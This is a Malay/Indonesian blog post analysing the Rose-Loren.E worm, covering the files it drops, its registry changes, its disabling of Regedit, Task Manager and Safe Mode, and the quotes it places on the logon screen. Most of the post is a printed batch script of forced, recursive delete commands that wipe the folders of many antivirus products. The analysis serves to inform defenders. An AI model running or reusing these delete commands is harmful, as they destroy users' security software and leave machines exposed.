Root Js

powered by
Socialbar

Malware




Info Malware

Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemprograman : Visual Basic
Icon : Folder Windows
Type : Worm
Date : 24 Feb 2011

Tentang Malware

Ini adalah hasil dari modifikasi dari sumber terdahulu. Setelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Sewaktu worm ini aktif di memory, komputer akan terasa lambat kerana proses Rose-Loren.E menahan resource yang cukup besar.

Companion/File Yang Dibuat

Ketika aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  Membuat file yang merupakan file induk/host dari worm, iaitu

C:\WINDOWS\system32\[5 buah bilangan nama]\lsass.exe dan
C:\WINDOWS\system32\[5 buah bilangan nama]\svchost.exe

   Membuat juga file dengan nama Explorer dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:

   del /f /q /s  C:\ESET\*.* >nul
   del /f /q /s  C:\antivi~1\*.* >nul
  del /f /q /s  C:\antivi~2\*.* >nul
   del /f /q /s  C:\antiviru\*.* >nul
   del /f /q /s  C:\avg\*.* >nul
   del /f /q /s  C:\kasper~1\*.* >nul
   del /f /q /s  C:\kasper~2\*.* >nul
  del /f /q /s  C:\mcafee\*.* >nul
  del /f /q /s  C:\mcafee.com\agent\*.* >nul
   del /f /q /s  C:\mcafee.com\*.* >nul
  del /f /q /s  C:\mcafee.com\VSO\*.* >nul
  del /f /q /s  C:\mcafee~1\*.* >nul
  del /f /q /s  C:\msav\*.* >nul
   del /f /q /s  C:\norman\*.* >nul
   del /f /q /s  C:\norton~1\*.* >nul
   del /f /q /s  C:\norton~2\*.* >nul
   del /f /q /s  C:\pav\*.* >nul
   del /f /q /s  C:\pccill~1\*.* >nul
  del /f /q /s  C:\iolo\*.* >nul
   del /f /q /s  C:\progra~1\ESET\*.* >nul
   del /f /q /s  C:\progra~1\antivi~1\*.* >nul
  del /f /q /s  C:\progra~1\antivi~2\*.* >nul
   del /f /q /s  C:\progra~1\avg\*.* >nul
   del /f /q /s  C:\progra~1\kasper~1\*.* >nul
   del /f /q /s  C:\progra~1\kasper~2\*.* >nul
   del /f /q /s  C:\progra~1\mcafee\*.* >nul
  del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
   del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
   del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
   del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
   del /f /q /s  C:\progra~1\mindso~1\*.* >nul
   del /f /q /s  C:\progra~1\norman\*.* >nul
   del /f /q /s  C:\progra~1\norton~1\*.* >nul
  del /f /q /s  C:\progra~1\norton~2\*.* >nul
   del /f /q /s  C:\progra~1\pandas~1\*.* >nul
  del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
   del /f /q /s  C:\progra~1\iolo\*.* >nul
   del /f /q /s /a:h  C:\ESET\*.* >nul
   del /f /q /s /a:h  C:\antivi~1\*.* >nul
  del /f /q /s /a:h  C:\antivi~2\*.* >nul
   del /f /q /s /a:h  C:\antiviru\*.* >nul
   del /f /q /s /a:h  C:\avg\*.* >nul
   del /f /q /s /a:h  C:\kasper~1\*.* >nul
   del /f /q /s /a:h  C:\kasper~2\*.* >nul
   del /f /q /s /a:h  C:\mcafee\*.* >nul
   del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
   del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
  del /f /q /s /a:h  C:\mcafee~1\*.* >nul
   del /f /q /s /a:h  C:\msav\*.* >nul
   del /f /q /s /a:h  C:\norman\*.* >nul
   del /f /q /s /a:h  C:\norton~1\*.* >nul
   del /f /q /s /a:h  C:\norton~2\*.* >nul
   del /f /q /s /a:h  C:\pav\*.* >nul
   del /f /q /s /a:h  C:\pccill~1\*.* >nul
   del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
   del /f /q /s /a:h  C:\iolo\*.* >nul
   del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
   del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
   del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
   del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
   del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
   del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
   del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
   del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
   del /f /q /s /a:R  C:\ESET\*.* >nul
   del /f /q /s /a:R  C:\antivi~1\*.* >nul
   del /f /q /s /a:R  C:\antivi~2\*.* >nul
  del /f /q /s /a:R  C:\antiviru\*.* >nul
  del /f /q /s /a:R  C:\avg\*.* >nul
  del /f /q /s /a:R  C:\kasper~1\*.* >nul
   del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
   del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
   del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
   del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
   del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
   del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
   del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
   del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
  del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul

Jika ianya menemui folder WinRar pada folder Program Files, maka Rose-Loren akan terus mengcopykan file data.exe dengan file gambar rose.jpg. Ianya juga mengubah icon pada flash disk kerana adanya file autorun.inf serta file desktop.ini yang boleh mengubah background flash disk menjadi bunga mawar. 

Yang berbeza adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.


Hasil Jangkitan

Worm ini banyak melakukan perubahan pada registry, melihat pada Legal Notification sebelum penampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap perkataan yang di masukkan ke registry.

Text yang dirandom adalah :

•   Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
•   Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti   orang lain
•   Mahkota kemanusiaan ialah rendah hati
•   Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
•   Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya iaitu baik dan burukmu
•   Sabar adalah jalan keluar bagi orang yang tidak boleh menemukan jalan keluar.
•   Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
•   Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
•   Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
•   Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
•   Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
•   Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
•   Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
•   Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
•   Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
•   Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
•   Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
•   Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
•   Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
•   Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
•   Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
•   Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
•   Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidina Ali)
•   Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
•   Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
•   Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
•   Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
•   Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
•   Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
•   Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
•   Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
•   Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
•   Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
•   Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
•   Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
•   Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.

Worm ini juga boleh menghilangkan beberapa menu pada Folder Options. Serta beberapa registry juga diubah, termasuk mematikan beberapa sistem Windows.

•   Regedit.exe
•   Msconfig.exe
•   taskmgr.exe
•   ntvdm.exe
•   rstrui.exe
•   EnableExtensions
•   FolderContentsInfoTip
•   NoRun
•   NoFind
•   DisableCurrentUserRun
•   HideFileExt
•   FolderSizeTip
•   ShowFullPathAddress
•   ShowFullPath
•   Disable SafeMode
•   Disable Show Hidden and Super Hidden files.

Worm juga akan membuat startup dengan nama WinUp dan RsWin


0 ulasan:

Post a Comment

Please Do Not Spam Here Moron. Everyone Welcome Here.